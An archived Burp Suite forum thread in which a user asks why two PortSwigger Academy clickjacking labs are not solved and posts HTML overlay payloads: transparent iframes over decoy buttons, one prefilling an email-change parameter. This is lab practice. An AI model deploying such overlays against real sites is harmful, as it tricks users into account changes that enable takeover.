Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Clickjacking labs are not getting solved

MrNobody | Last updated: Feb 27, 2023 03:49PM UTC

I am trying to solve the clickjacking lab from Portswigger academy. I have made all the alignments according to the lab but still, it is not solved. LAB #1: Basic clickjacking with CSRF token protection <style> iframe{ position:absolute; width:1500px; height:1500px; opacity:0.001; z-index:2; } div{ position:relative; left:200px; top:560px; z-index:1; padding:20px 40px; } </style> <div>click</div> <iframe src="https://MY-LAB-ID.web-security-academy.net/my-account"></iframe> LAB#2: Clickjacking with form input data prefilled from a URL parameter <style> iframe{ position:absolute; height:1300px; width:1300px; opacity:0.001; z-index:1;} div{ position:relative; top:500px; left:125px; z-index:2; }</style> <div>Click me</div> <iframe src="https://MY-LAB-ID.web-security-academy.net/my-account?email=youare@hacked.com"></iframe> Please help me with that. PS: Yes I have put my lab id in place of 'MY-LAB-ID'.

MrNobody | Last updated: Feb 27, 2023 04:00PM UTC

One thing I noticed is that when I hover over the Div tag element, the cursor is not changing to the link cursor.

Ben, PortSwigger Agent | Last updated: Feb 28, 2023 09:47AM UTC